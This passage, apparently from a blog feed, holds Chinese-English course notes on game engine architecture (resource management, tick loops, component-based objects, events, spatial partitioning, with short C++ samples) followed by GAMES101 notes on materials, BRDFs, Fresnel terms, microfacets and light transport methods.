• Unify file access by defining a meta asset file format (i.e., .ast)

      通过定义元资产文件格式(即 .ast)来统一文件访问(对于 PSD、MAX、MAYA 这种类型的文件,可能包含了大量对游戏引擎来说的无用信息,应该去除。)

    • Assets are faster to access by importing preprocess

      通过导入预处理可以更快地访问资产

    • Build a composite asset file to refer to all resources

      构建复合资产文件以引用所有资源

• GUID is an extra protection of reference

  GUID 是对资源引用的额外保护

    Resource-Runtime Asset Manager

    ​资源运行时资产管理器

    png

    Runtime Resource Management

    ​运行时资源管理(游戏运行时需要加载/移除哪些资源)

    • A virtual file system to load/unload assets by path reference

      通过路径引用加载/卸载资源的虚拟文件系统

    • Manage asset lifespan and reference by handle system

通过句柄(handle)系统管理资产的生命周期和引用

    Resource-Manage Asset Life Cycle

    ​资源管理资产生命周期

    png

    Memory management for Resources - life cycle

    ​资源的内存管理 - 生命周期

    • Different resources have different life cycles

      不同的资源有不同的生命周期

    • Limited memory requires release of loaded resources when possible

      有限的内存需要尽可能释放已加载的资源

• Garbage collection and deferred loading are critical features

      垃圾收集和延迟加载是关键功能

    Function-How to Make the World Alive

    png

    ​功能层有这么多东西需要去实现。

    Function-Dive into Ticks

    png

​功能层必须在每个 tick 内完成 Logic、Input、Camera、Motor、Character Controller、Animation、Physics、Render、Network、I/O、Memory GC 等的处理。

    Function-Tick the Animation and Renderer

    ​对于动画和渲染器来说……

    png

    • In each tick (over-simplified version)

      在每个刻度中(过于简化的版本)

      • Fetch animation frame of character

        获取角色的动画帧

      • Drive the skeleton and skin of character

        驱动角色的骨骼和皮肤

      • The renderer processes all rendering jobs in an iteration of the render tick for each frame

        渲染器在每帧的渲染 tick 迭代中处理所有渲染作业

    Function-Heavy-duty Hotchpotch

    ​重型大杂烩

    png

    • Function Layer provides major function modules for the game engine

      功能层为游戏引擎提供主要功能模块

      • Object system (HUGE)

        对象系统(巨大)

    • Game Loop updates the systems periodically

      游戏循环定期更新系统

      • Game Loop is the key to reading the code of a game engine

        游戏循环是阅读游戏引擎代码的关键

    • Blur the boundary between engine and game

      模糊引擎和游戏之间的界限

      • Camera, character and behavior

        镜头、角色和行为

      • Design extendable engine API for programmers

        为程序员设计可扩展的引擎 API

    Function-Multi-Threading

    ​多线程

    png

    • Multi-core processors become the mainstream

      多核处理器成为主流

      • Many systems in game engine are built for parallelism

        游戏引擎中的许多系统都是为并行性而构建的

    Core-Math Library

    png

    ​一个数学库,实现渲染之类的功能。

Core-Math Efficiency

    png

​核心层要讲究效率,比如直接用 1/sqrt(x) 计算平方根倒数速度慢,要换一种近似但更快速的算法,见下例。
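​一个著名的例子是 Quake III Arena 源码中的快速反平方根:用位运算取得近似初值,再做一次牛顿迭代,比直接调用 1.0f / sqrtf(x) 更快(精度略低;现代 C++ 应改用 std::bit_cast 或 memcpy 规避指针别名问题,这里保留原始写法仅作示意):

// Quake III Arena 中的快速反平方根(魔数 0x5f3759df)
float Q_rsqrt(float number)
{
    long i;
    float x2, y;
    const float threehalfs = 1.5F;

    x2 = number * 0.5F;
    y  = number;
    i  = *(long*)&y;                       // 把浮点数的位模式按整数读取
    i  = 0x5f3759df - (i >> 1);            // 在“对数域”上近似 -1/2 次幂
    y  = *(float*)&i;
    y  = y * (threehalfs - (x2 * y * y));  // 一次牛顿迭代提升精度
    return y;
}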

    Core -Data Structure and Containers

    ​处理数据结构

    png

    • Vectors, maps, trees, etc.

向量、映射(map)、树等

    • Customized containers outperform STL

      定制的容器与算法性能优于 STL

    • Avoid memory FRAGMENTATION!

      避免内存碎片!


    • Skeleton tree

      骨架树

    • Animation frame sequence

      动画帧序列

    Core-Memory Management

    ​核心内存管理

    • Major bottlenecks of game engine performance

      游戏引擎性能的主要瓶颈

      • Memory Pool / Allocator

        内存池/分配器

      • Reduce cache miss

        减少缓存未命中

      • Memory alignment

        内存对齐

    • Polymorphic Memory Resource (PMR)

      多态内存资源(PMR)

    png

    • Cache locality/diffusion

      缓存局部性/扩散

    • Memory Arena

      内存池


    • Put data together

      将数据放在一起

    • Access data in order

      按顺序访问数据

    • Allocate and de-allocate as a block

以整块的方式分配和释放
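​上面三条原则可以用 C++17 标准库的多态内存资源直接演示(最小草图):预先划出一整块缓冲区作为 arena,容器在其中连续分配、整块释放。

#include <cstddef>
#include <memory_resource>
#include <vector>

int main()
{
    // 一整块预分配的缓冲区,充当内存池(arena)
    std::byte buffer[64 * 1024];
    std::pmr::monotonic_buffer_resource arena{buffer, sizeof(buffer)};

    // 容器元素在 arena 中连续分配:数据放在一起、可按顺序访问
    std::pmr::vector<int> positions{&arena};
    for (int i = 0; i < 1000; ++i)
        positions.push_back(i);

    // monotonic_buffer_resource 不逐个 free,arena 销毁时整块释放
}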

    Core-Foundation of Game Engine

    ​游戏引擎核心基础

    png

    • Core layers provide utilities needed in various function modules

      核心层提供各种功能模块所需的实用程序

    • Super high performance design and implementation

      超高性能设计与实现

    • High standard of coding

      高标准的编码

    Platform-Target on Different Platform

​面向不同的目标平台

Compatibility with different platforms; provides platform-independent services and information for upper layers

    ​不同平台的兼容性,为上层提供平台无关的服务和信息

    png

    • File system

      文件系统

      • Path: Slash/backslash, Environment variables

        路径:斜杠/反斜杠、环境变量

      • Directory Traversal

        目录遍历

Platform-Graphics API

​图形 API

Render Hardware Interface (RHI)

​渲染硬件接口(RHI)

    • Transparently support different GPU architectures and SDKs

      对不同的 GPU 架构和 SDK 保持透明

    • Automatic optimization of target platforms

      自动优化目标平台

    png

​在底层 API 上用 C++ 的虚函数再封装一层,如下面的草图。
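​下面是这种做法的最小草图(类名与接口均为本文假设,并非某个真实引擎的 RHI):上层渲染代码只依赖抽象接口,每个底层图形 API 提供一份实现,运行时按平台选择其一。

#include <cstddef>
#include <memory>

class RHIBuffer {
public:
    virtual ~RHIBuffer() = default;
};

// 上层渲染代码只看到这组纯虚接口,不直接接触任何图形 API
class RHI {
public:
    virtual ~RHI() = default;
    virtual std::unique_ptr<RHIBuffer> createVertexBuffer(const void* data,
                                                          std::size_t size) = 0;
    virtual void draw(RHIBuffer& vertexBuffer, int vertexCount) = 0;
};

// 每个底层 API 一份实现
class VulkanRHI : public RHI { /* 用 Vulkan 实现上述虚函数 */ };
class D3D12RHI  : public RHI { /* 用 D3D12 实现上述虚函数 */ };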

    Platform-Hardware Architecture

    ​硬件架构

    png

    ​平台层要适应不同种硬件架构。

    Tool-Allow Anyone to Create Game

    ​允许任何人创建游戏

    png

    Unleash the Creativity

    ​释放创造力。创造对游戏开发者友好的开发环境。

    • Build upon game engine

      基于游戏引擎构建

    • Create, edit and exchange game play assets

      创建、编辑和交换游戏资产

Flexibility of coding languages

    ​灵活的编码语言

    Tool-Digital Content Creation

    png

    Asset Conditioning Pipeline

​资产调整管道

    Why Layered Architecture?

    png

    Decoupling and Reducing Complexity

    ​解耦并降低复杂性

    • Lower layers are independent from upper layers

      下层独立于上层

    • Upper layers don’t know how lower layers are implemented

      上层不知道下层是如何实现的

    Response for Evolving Demands

    ​响应不断变化的需求

    • Upper layers evolve fast, but lower layers are stable

      上层发展很快,但下层稳定

    Mini Engine-Pilot

    ​课程特意设计的小游戏引擎。

    Neat PILOT Engine

    ​整洁的 PILOT 引擎

    png

Built with C/C++

​用 C/C++ 构建

    • Runtime: ~13,000 lines

运行时:约 13,000 行

    • Editor: ~2,000 lines

      编辑器:约 2,000 行

    Follow Engine Layers

    ​遵循引擎分层

    • Source code still improving

      源代码仍在改进

    Support Platform

    ​支持平台

    • Windows
    • Linux
• macOS (working on M1)

PILOT Editor and Runtime

    ​编辑器和运行时

    Basic Editing

    ​基础编辑

    • Add/Delete objects

      添加/删除对象

• Move/Scale/Rotate objects

      移动/缩放/旋转对象

    Simple Functions

    ​简单的功能

    • Character control

      角色控制

    • Camera

      相机

    png

    ​这个游戏引擎还引入了 ECS。

    第三节:如何构建游戏世界

    How to build a game world?

    • What does a game world consist of?

      游戏世界由什么组成?

    • How should we describe these things?

      我们该如何描述这些事情呢?

    • How are these things organized?

      这些东西是如何组织的?

    Dynamic Game Objects

    png

    ​假设我想创建一个射击游戏场景,我设计一些可以随游戏进程而改变的 GameObject(GO)。

    Static Game Objects

    png

    ​再设计一些不可随游戏进程改变(游戏生成时长啥样,就是啥样)的 GO。

    Environments

    png

    ​由地编生成的环境。

    Other Game Objects

    png

​还有一些或许不可见的东西,比如空气墙、触发区域、特定规则、导航网格等。

    Everything is a Game Object

    png

    ​这些东西都可称之为 Game Object(GO)。

    How to Describe a Game Object?

    png

    ​我们该如何描述一个 GO 呢?假如,我们想要一个 drone 无人机。

    How Do We Describe a Drone in Reality?

    ​现实环境中,如何描述一个无人机?

    ​Properties and behaviors!

    • Shape (property)

      形状(属性)

    • Position (property)

      位置(属性)

    • Move (behavior)

      移动(行为)

    • Capacity of battery (property)

      电池容量(属性)

    • Etc.

    Game Object

    png

    ​将 property 用变量定义,behavior 用函数定义。

class Drone
{
public:
    /* Properties */
    Vector3 position;
    float health;
    float fuel;
    // ...

    /* Behaviors */
    void move();
    void scout();
    // ...
};

    Drone vs. Armed Drone

    png

    ​这个时候我们想设计一个战斗无人机,比起一般无人机,多了 ammo 弹药的 property 和 fire 的 behaviour。

    Game Object

    • Inheritance

      继承

    png

​使用继承的方法,让 ArmedDrone 继承 Drone 类,然后写上 ammo 弹药的 property 和 fire 的 behaviour 的定义,如下所示。
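​最小示例(承接上面的 Drone 类):

class ArmedDrone : public Drone
{
public:
    /* New property */
    float ammo;

    /* New behavior */
    void fire();
};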

    No Perfect Classification in the Game World!

    png

    ​但当继承派生的类变得复杂时,简单的继承就不太好使了。

    Component Base

    png

    png

    • Component Composition in the Real World

      现实世界中的组件构成

    ​将一个实体拆分成各个组件再操作!

    Components of a Drone

    png

    ​对于我们定义的无人机,我们将它拆分成多个 components:

    • Transform 变换
    • Motor 发动机
    • Model 模型
    • AI
    • Animations 动画
    • Physics 物理

    png

    Component

    • Drone vs. Armed Drone

    png

    ​此时,如果我们在无人机的基础上想要改成战斗机,只需修改其中的部分 components 即可。
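​一个基于组件的 GameObject 最小草图(写法为本文假设,并非 Unity/UE 的真实 API):GO 只是组件的容器,无人机 = Transform + Motor + Model + … 的组合,改成战斗无人机时只需增换个别组件,而不用修改继承树。

#include <memory>
#include <utility>
#include <vector>

class Component {
public:
    virtual ~Component() = default;
    virtual void tick(float deltaTime) = 0;
};

class TransformComponent : public Component {
public:
    float position[3]{};
    void tick(float) override {}
};

class GameObject {
public:
    // 往 GO 上挂一个组件;换“装备” = 增删组件
    template <typename T, typename... Args>
    T& addComponent(Args&&... args) {
        components_.push_back(std::make_unique<T>(std::forward<Args>(args)...));
        return static_cast<T&>(*components_.back());
    }
    void tick(float dt) {
        for (auto& c : components_) c->tick(dt);
    }
private:
    std::vector<std::unique_ptr<Component>> components_;
};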

    Components in Commercial Engines

    png

    ​在 Unity 和 UE 两大商业引擎中,也使用了 components 的思想

    Takeaways

    • Everything is a game object in the game world

      游戏世界中的一切都是游戏对象

    • Game object could be described in the component-based way

      游戏对象可以用基于组件的方式描述

    How to Make the World Alive?

    ​如何让世界运行起来?

    Object-based Tick

    png

    ​Tick 相当于游戏世界中的普朗克时间。

    ​基于对象的 tick,每个 Tick 中分别处理好各个 GO 的逻辑。

    Component-based Tick

    png

    ​基于组件的 Tick,依次处理好各个 component 的逻辑。
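​两种 tick 方式的对比草图(World、各组件类型均为本文假设的最小类型):基于对象时每个 GO 自己依次更新所有组件;基于组件时按组件类型批量更新,同类数据连续存放,便于并行,也减少 cache miss。

#include <vector>

// 假设的最小类型:World 把同类组件连续存放在各自的数组里
struct TransformComp { void tick(float) { /* 更新变换 */ } };
struct MotorComp     { void tick(float) { /* 更新运动 */ } };
struct AnimationComp { void tick(float) { /* 更新动画 */ } };

struct World {
    std::vector<TransformComp> transforms;
    std::vector<MotorComp>     motors;
    std::vector<AnimationComp> animations;
};

struct GameObject { void tick(float) {} }; // 内部依次更新它挂载的各组件

// 基于对象的 tick:逐个 GO
void tickObjectBased(std::vector<GameObject*>& gameObjects, float dt)
{
    for (auto* go : gameObjects)
        go->tick(dt); // transform -> motor -> animation -> ...
}

// 基于组件的 tick:逐类组件,顺序访问连续内存
void tickComponentBased(World& world, float dt)
{
    for (auto& t : world.transforms) t.tick(dt);
    for (auto& m : world.motors)     m.tick(dt);
    for (auto& a : world.animations) a.tick(dt);
}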

    Object-based Tick vs. Component-based Tick

    png

    • Object-based tick

基于对象的 tick

      • Simple and intuitive

        简单直观

      • Easy to debug

        易于调试

    png

    • Component-based tick

基于组件的 tick

      • Parallelized processing

        并行处理

      • Reduced cache miss

        减少缓存未命中

    ​更高效!

    How to Explode an Ammo in a Game?

    ​如何处理游戏中弹药爆炸的逻辑?

    Hardcode

    png

    ​给炸弹爆炸时写一个函数,判断周围 GO 的类型然后逐个写逻辑。

    Events

    png

    ​炸弹爆炸时分发一个消息,各个 GO 接收到消息后执行逻辑。

    • Message sending and handling

      消息发送和处理

    • Decoupling event sending and handling

      解耦事件发送和处理

    ​这么做耦合度低,被普遍采用。
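​一个最小的事件订阅/派发草图(假设性实现):炸弹爆炸时只调用一次 broadcast,各 GO 事先订阅感兴趣的事件并自行决定如何响应,发送方与接收方互不知晓。

#include <functional>
#include <map>
#include <string>
#include <vector>

class EventBus {
public:
    using Handler = std::function<void(const void* payload)>;

    // GO 在初始化时订阅自己关心的事件
    void subscribe(const std::string& event, Handler h) {
        handlers_[event].push_back(std::move(h));
    }
    // 事件发生时广播给所有订阅者
    void broadcast(const std::string& event, const void* payload = nullptr) {
        for (auto& h : handlers_[event]) h(payload);
    }
private:
    std::map<std::string, std::vector<Handler>> handlers_;
};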

    Events Mechanism in Commercial Engines

    ​商业引擎中的事件机制

    png

    ​Unity 和 UE 中都普遍用到了这样的机制。

    How to Manage Game Objects?

    ​如何管理 GO?

    Scene Management

    png

    • Game objects are managed in a scene

      游戏对象在场景中管理

    • Game object query

      游戏对象查询

      • By unique game object ID

        通过唯一的游戏对象 ID

      • By object position

        按物体位置

    png

    ​假设一个炮弹爆炸派发了一个事件,要让游戏中的所有 GO 接受这个事件并处理(是否在爆炸范围内),性能太低,需要作出一定的空间划分。

    • Simple space segmentation

      简单的空间划分

    png

    • Segmented space by object clusters

      按对象簇分割空间

    • Hierarchical segmentation

      分层细分

    png

    • Spatial Data Structures

      空间数据结构

    png

    ​划分空间的各个算法:

    • Bounding Volume Hierarchies (BVH)

      边界体积层次结构 (BVH)

    • Binary Space Partitioning (BSP)

二叉空间划分(BSP)

    • Octree

      八叉树

    • Scene Graph

      场景图

    Takeaways

    • Everything is an object

      一切都是对象

    • Game object could be described in the component-based way

      游戏对象可以用基于组件的方式描述

    • States of game objects are updated in tick loops

游戏对象的状态在 tick 循环中更新

    • Game objects interact with each other via event mechanism

      游戏对象通过事件机制相互交互

    • Game objects are managed in a scene with efficient strategies

      游戏对象在场景中以有效的策略进行管理

    png

​对于一些存在父子层级关系的 GO,更新时需要注意先后顺序(先更新父节点,再更新子节点)。

    png

    ​Animation、Motor 和 Physics 三个 components 相互影响,如果互相派发消息,性能会不佳。

    png

    Immediate Event Sending or not

    ​是否立即发送事件

    ​可以设计一个“邮局”,收发消息由这个邮局控制,提升性能!
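​“邮局”的最小草图(假设性实现):事件先投入邮箱,由邮局在每帧的固定阶段统一派发,避免组件之间即时互发消息造成的级联调用。

#include <queue>
#include <string>

struct Event { std::string type; /* payload ... */ };

class PostOffice {
public:
    // 任何时刻都可以投递,先入队不立即处理
    void post(Event e) { mailbox_.push(std::move(e)); }

    // 每帧固定阶段统一派发这一帧积累的全部事件
    template <typename Dispatcher>
    void flush(Dispatcher&& dispatch) {
        while (!mailbox_.empty()) {
            dispatch(mailbox_.front());
            mailbox_.pop();
        }
    }
private:
    std::queue<Event> mailbox_;
};

​游戏循环在每帧末尾调用 flush,把这一帧积累的事件一次性处理掉。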

    ]]>
    @@ -2141,7 +2141,7 @@ /posts/GAMES101-%E7%8E%B0%E4%BB%A3%E8%AE%A1%E7%AE%97%E6%9C%BA%E5%9B%BE%E5%BD%A2%E5%AD%A6%E5%85%A5%E9%97%A8-%E9%97%AB%E4%BB%A4%E7%90%AA%EF%BC%886%EF%BC%89/ - 资源

    课程

    Lecture 17 Materials and Appearances

    The Appearance of Natural Materials

    ​天然材质的外观

    png

    ​大千世界,材质万千。


    What is Material in Computer Graphics?

    ​计算机图形学中的材质是什么?

    png

    Material == BRDF

    ​BRDF 是双向反射分布函数(Bidirectional Reflectance Distribution Function)的缩写。它是描述表面材质如何反射入射光的函数。BRDF 定义了给定入射方向和出射方向下,单位入射光能量在各个出射方向上的分布。简单来说,BRDF 描述了光线与表面相互作用时光的反射特性。

    What is this material?

    png

    Diffuse / Lambertian Material (BRDF)

    ​漫反射/朗伯材质 (BRDF)

    png


    Light is equally reflected in each output direction

    ​光线在每个输出方向上均等反射

    png

    Suppose the incident lighting is uniform:

    ​假设入射光是均匀的:

$$\begin{aligned}
L_o(\omega_o)&=\int_{H^2}f_r\,L_i(\omega_i)\cos\theta_i\,\mathrm{d}\omega_i \\
&=f_r\,L_i\int_{H^2}\cos\theta_i\,\mathrm{d}\omega_i \\
&=\pi f_r L_i
\end{aligned}$$

    $f_r=\frac{\rho}{\pi}$——albedo 反照率 (color)


    What is this material?

    png


    Glossy material (BRDF)

    ​光泽材质(BRDF)

    png


    What is this material?

    png


    Ideal reflective / refractive material (BSDF)*

    ​理想的反射/折射材料 (BSDF*)

    png


    Perfect Specular Reflection

    ​完美的镜面反射(只有反射没有折射)

    png

    png

    Top-down view (looking down on surface)
    自上而下的视图(俯视表面)

    png

$$\omega_o+\omega_i=2\cos\theta\,\vec{\mathrm{n}}=2(\omega_i\cdot\vec{\mathrm{n}})\,\vec{\mathrm{n}}$$

    $$\omega_o=-\omega_i+2(\omega_i\cdot\vec{\mathrm{n}})\vec{\mathrm{n}}$$


    Perfect Specular Reflection BRDF

    ​完美镜面反射 BRDF

    png


    Specular Refraction

    ​镜面折射

    In addition to reflecting off surface, light may be transmitted through surface.

    ​除了从表面反射外,光还可以穿过表面。

    Light refracts when it enters a new medium.

    ​光进入新介质时会发生折射。

    png


Snell’s Law

    ​斯涅尔定律

    Transmitted angle depends on

    ​透射角取决于

    index of refraction (IOR) for incident ray

    ​入射光线的折射率 (IOR)

    index of refraction (IOR) for exiting ray

    ​出射光线的折射率 (IOR)

    png

    $$\eta_i\sin\theta_i=\eta_t\sin\theta_t$$


    Law of Refraction

    ​折射定律

    png

$$\begin{aligned}
\eta_i\sin\theta_i&=\eta_t\sin\theta_t \\
\cos\theta_t&=\sqrt{1-\sin^2\theta_t} \\
&=\sqrt{1-\left(\frac{\eta_i}{\eta_t}\right)^2\sin^2\theta_i} \\
&=\sqrt{1-\left(\frac{\eta_i}{\eta_t}\right)^2(1-\cos^2\theta_i)}
\end{aligned}$$

    Total internal reflection:

    ​全内反射

    When light is moving from a more optically dense medium to a less optically dense medium:

    ​当光从光密度较大的介质移动到光密度较小的介质时:

$$1-\left(\frac{\eta_i}{\eta_t}\right)^2(1-\cos^2\theta_i)<0$$

    求得

    $$\frac{\eta_i}{\eta_t}>1$$

    Light incident on boundary from large enough angle will not exit medium.

    ​从足够大的角度入射到边界的光将不会离开介质。


Snell’s Window / Circle

    png


    Fresnel Reflection / Term

    ​菲涅尔项

    Reflectance depends on incident angle (and polarization of light)

    ​反射率取决于入射角(和光的偏振)

    png

    This example: reflectance increases with grazing angle

    ​本例:反射率随观察角增加(变亮了)

    ​Fresnel Term(菲涅尔项)描述了光线与介质界面之间的反射和透射的比例。菲涅尔项是一个关于入射角度和折射率之间关系的函数,通常用来计算光线在介质表面的反射和透射的强度。

    ​在计算菲涅尔项时,通常使用菲涅尔方程来描述入射光线在介质表面的反射和透射情况。菲涅尔方程包括两个方面:垂直极化和平行极化。垂直极化表示光的电场矢量垂直于入射平面,而平行极化表示电场矢量在入射平面内。

    ​菲涅尔项的计算取决于入射角度、折射率以及光线的极化状态。在计算机图形学和光学模拟中,菲涅尔项通常被用于模拟材质的反射特性,以便更准确地模拟真实世界中的光线行为。


    Fresnel Term (Dielectric, $\eta=1.5$)

    ​菲涅尔项(介电体,$\eta=1.5$)

    png

    • S 极化(也称为垂直极化):在S极化状态下,入射光的电场矢量与入射平面垂直。当光线以 S 极化状态入射到介质表面时,其部分能量会被反射,而部分会被折射。S 极化通常与垂直于入射平面的反射和透射相关联。

    • P 极化(也称为平行极化):在P极化状态下,入射光的电场矢量位于入射平面内。与 S 极化类似,当光线以 P 极化状态入射到介质表面时,也会发生一部分反射和一部分折射。P极化通常与入射平面内的反射和透射相关联。

    • “unpolarized”(非偏振)光是指入射光中电场矢量的方向没有特定的取向,而是随机分布的。这意味着它包含了各种极化状态的光,无法用 S 极化或 P 极化来描述。非偏振光通常是自然光或由光源发出的常见光线,其电场矢量在所有可能的方向上均匀分布。在介质表面反射时,非偏振光的极化状态可能会因反射而发生改变,产生 S 极化和 P 极化的组合。

    ​与表面法线夹角越大,反射率越高。


    Fresnel Term (Conductor)

    ​菲涅尔项(导体)

    png


    Fresnel Term — Formulae

    ​菲涅尔项 — 公式

    Accurate: need to consider polarization

    ​准确:需要考虑极化

$$R_\mathrm{s}=\left|\frac{n_1\cos\theta_\mathrm{i}-n_2\cos\theta_\mathrm{t}}{n_1\cos\theta_\mathrm{i}+n_2\cos\theta_\mathrm{t}}\right|^2=\left|\frac{n_1\cos\theta_\mathrm{i}-n_2\sqrt{1-\left(\frac{n_1}{n_2}\sin\theta_\mathrm{i}\right)^2}}{n_1\cos\theta_\mathrm{i}+n_2\sqrt{1-\left(\frac{n_1}{n_2}\sin\theta_\mathrm{i}\right)^2}}\right|^2$$

$$R_\mathrm{p}=\left|\frac{n_1\cos\theta_\mathrm{t}-n_2\cos\theta_\mathrm{i}}{n_1\cos\theta_\mathrm{t}+n_2\cos\theta_\mathrm{i}}\right|^2=\left|\frac{n_1\sqrt{1-\left(\frac{n_1}{n_2}\sin\theta_\mathrm{i}\right)^2}-n_2\cos\theta_\mathrm{i}}{n_1\sqrt{1-\left(\frac{n_1}{n_2}\sin\theta_\mathrm{i}\right)^2}+n_2\cos\theta_\mathrm{i}}\right|^2$$

    $$R_\mathrm{eff}=\frac12\left(R_\mathrm{s}+R_\mathrm{p}\right)$$

Approximate: Schlick’s approximation

    ​近似:Schlick 近似

$$\begin{aligned}
R(\theta)&=R_0+(1-R_0)(1-\cos\theta)^5 \\
R_0&=\left(\frac{n_1-n_2}{n_1+n_2}\right)^2
\end{aligned}$$
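​按上面的 Schlick 公式可以直接写出实现(示意;函数名为本文假设):

#include <cmath>

// cosTheta 为入射方向与法线夹角的余弦,n1/n2 为界面两侧折射率
float fresnelSchlick(float cosTheta, float n1, float n2)
{
    float r0 = (n1 - n2) / (n1 + n2);
    r0 = r0 * r0;                                           // R0
    return r0 + (1.0f - r0) * std::pow(1.0f - cosTheta, 5.0f);
}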

    Microfacet Material

    ​微面片材质

    png

    ​从太空中看地球,看不出山脉的粗糙,反而是一片光滑的感觉。


    Microfacet Theory

    ​微面理论

    png

    Rough surface

    ​粗糙表面

    • Macroscale: flat & rough

      宏观尺度:平坦且粗糙

    • Microscale: bumpy & specular

      微观尺度:凹凸不平且镜面反射

    Individual elements of surface act like mirrors

    表面的各个元素就像镜子一样

    • Known as Microfacets

      称为微面

    • Each microfacet has its own normal

      每个微面都有自己的法线


    Key: the distribution of microfacets’ normals

    ​关键:微面元法线的分布

    png

    • Concentrated <==> glossy

      集中 <==> 光泽

    png

    • Spread <==> diffuse

      分散 <==> 漫射


    Microfacet BRDF

    • What kind of microfacets reflect $w_i$ to $w_o$? (hint: microfacets are mirrors)

      什么样的微表面能将 $w_i$ 反射到 $w_o$?(提示:微表面是镜子)

    png

    $f(\mathbf{i},\mathbf{o})=\frac{\mathbf{F}(\mathbf{i},\mathbf{h})\mathbf{G}(\mathbf{i},\mathbf{o},\mathbf{h})\mathbf{D}(\mathbf{h})}{4(\mathbf{n,i})(\mathbf{n,o})}$

    • $\mathbf{F}(\mathbf{i},\mathbf{h})$​:Fresnel term 菲涅尔项
    • $\mathbf{G(i,o,h)}$:shadowing-masking term 遮蔽掩蔽项(微表面反射时被另一个微表面所阻挡)
    • $\mathbf{D(h)}$​:distribution of normals(法线的分布)
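​其中法线分布项 D(h) 的一个常用选择是 GGX(Trowbridge-Reitz)分布,下面是它的示意实现(这是常见做法之一,并非本课唯一指定;alpha 为粗糙度参数):

#include <cmath>

// nDotH 为宏观法线 n 与半程向量 h 的点积
float ggxNDF(float nDotH, float alpha)
{
    const float pi = 3.14159265358979f;
    float a2 = alpha * alpha;
    float d  = nDotH * nDotH * (a2 - 1.0f) + 1.0f;
    return a2 / (pi * d * d);   // D(h) = a^2 / (pi * ((n.h)^2 (a^2-1) + 1)^2)
}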

    png


    Isotropic / Anisotropic Materials (BRDFs)

    ​各向同性/各向异性材料 (BRDF)

    png

    ​对不同方向光反射率不一样,称为各向异性材料(一般现实生活中,这种材料都是人造的)

    • Key: directionality of underlying surface

      关键词:底层表面的方向性

    png


    Anisotropic BRDFs

    ​各向异性 BRDF

    Reflection depends on azimuthal angle $\Phi$

    ​反射取决于方位角 $\Phi$

    $$f_r(\theta_i,\phi_i;\theta_r,\phi_r)\neq f_r(\theta_i,\theta_r,\phi_r-\phi_i)$$

    Results from oriented microstructure of surface, e.g., brushed metal

    ​来自表面定向微结构的结果,例如拉丝金属

    png

    png

    png

    png

    ​这玩意摸一摸还能改变它的纹路。


    Properties of BRDFs

    ​BRDF 的性质

    • Non-negativity

      非负性

    $$f_r(\omega_i\to\omega_r)\ge 0$$

    • Linearity

      线性叠加

    $$L_r(\mathrm{p},\omega_r)=\int_{H^2}f_r(\mathrm{p},\omega_i\to\omega_r)L_i(\mathrm{p},\omega_i)\cos\theta_i\mathrm{d}\omega_i$$

    png

    • Reciprocity principle

      可逆性

    $$f_r(\omega_r\to\omega_i)=f_r(\omega_i\to\omega_r)$$

    png

    • Energy conservation

      能量守恒

    $$\forall\omega_r\int_{H^2}f_r(\omega_i\to\omega_r)\cos\theta_i\mathrm{d}\omega_i\leq1$$

    ​一部分能量被吸收,$\le 1$

    • Isotropic vs. anisotropic
      • If isotropic, $f_r(\theta_i,\phi_i;\theta_r,\phi_r)=f_r(\theta_i,\theta_r,\phi_r-\phi_i)$
      • Then, from reciprocity, $f_r(\theta_i,\theta_r,\phi_r-\phi_i)=f_r(\theta_r,\theta_i,\phi_i-\phi_r)=f_r(\theta_i,\theta_r,|\phi_r-\phi_i|)$

    png

    Measuring BRDFs

    Measuring BRDFs: Motivation

    ​测量 BRDF:动机

    Avoid need to develop / derive models

    • Automatically includes all of the scattering effects present

    Can accurately render with real-world materials

    • Useful for product design, special effects, …

    Theory vs. practice:

    png


    Image-Based BRDF Measurement

    ​基于图像的 BRDF 测量

    png

    ​光线照着物体,相机绕物体一周。


Measuring BRDFs: gonioreflectometer

    ​测量 BRDF:测角反射计

    png


    Measuring BRDFs

    General approach:

    ​一般的做法:

foreach outgoing direction wo                                   对于每个出射方向 wo
    move light to illuminate surface with a thin beam from wo   移动光源,使来自 wo 的细光束照亮表面
    foreach incoming direction wi                                对于每个入射方向 wi
        move sensor to be at direction wi from surface           移动传感器,使其位于表面的 wi 方向上
        measure incident radiance                                测量入射辐射亮度

    Improving efficiency:

    ​提高效率:

    • Isotropic surfaces reduce dimensionality from 4D to 3D

      各向同性表面将维度从 4D 降低到 3D

    • Reciprocity reduces # of measurements by half

      互易性将测量次数减少一半

    • Clever optical systems…

      智能光学系统……


    Challenges in Measuring BRDFs

    • Accurate measurements at grazing angles

      以掠射角进行精确测量

    • Important due to Fresnel effects

      由于菲涅尔效应而显得重要

    • Measuring with dense enough sampling to capture high frequency specularities

      使用足够密集的采样进行测量以捕捉高频镜面反射

    • Retro-reflection

      回射

    • Spatially-varying reflectance, …

      空间变化的反射率,…


    Representing Measured BRDFs

    ​表示测量的 BRDF

    Desirable qualities

    ​理想品质

    • Compact representation

      紧凑表示

    • Accurate representation of measured data

      测量数据的准确表示

    • Efficient evaluation for arbitrary pairs of directions

      对任意方向对的有效评估

    • Good distributions available for importance sampling

      可用于重要性抽样的良好分布


    Tabular Representation

    ​表格表示

Store regularly-spaced samples in $(\theta_i,\theta_o,|\phi_i-\phi_o|)$ / 将间隔均匀的样本存储在 $(\theta_i,\theta_o,|\phi_i-\phi_o|)$ 中

    • Better: reparameterize angles to better match specularities

      更好:重新参数化角度以更好地匹配镜面反射

    Generally need to resample measured values to table

    ​通常需要将测量值重新采样到表中

    Very high storage requirements

    ​存储要求非常高

    png

    Lecture 18 Advanced Topics in Rendering

    Advanced Light Transport

1. Unbiased light transport methods(无偏光线传输方法)
  • 这些方法旨在不引入系统性偏差地模拟真实世界中光的行为。
  • 无偏方法通常通过追踪光线的路径并对其进行积分来实现。典型的无偏方法包括路径追踪(Path Tracing)、双向路径追踪(Bidirectional Path Tracing)和 Metropolis 光线传输(Metropolis Light Transport)等。
  • 优点:可以获得高质量、逼真的图像,特别是对于复杂的光照和材质场景。
  • 缺点:由于需要追踪大量的光线路径并进行复杂的积分计算,无偏方法通常具有较高的计算成本。
2. Biased light transport methods(有偏光线传输方法)
  • 这些方法通过引入一定的偏差或近似,以减少计算成本并加快渲染速度。
  • 有偏方法的设计目标是在保持图像质量的同时降低计算复杂度。
  • 典型的有偏方法包括光子映射(Photon Mapping)、顶点连接与合并(VCM)、即时辐射度(Instant Radiosity)等。
  • 优点:通常比无偏方法更快速,尤其适用于实时渲染和交互式应用。
  • 缺点:可能会引入一定程度的图像噪声或伪影,因为近似方法可能无法完全准确地模拟真实世界中的光传输。

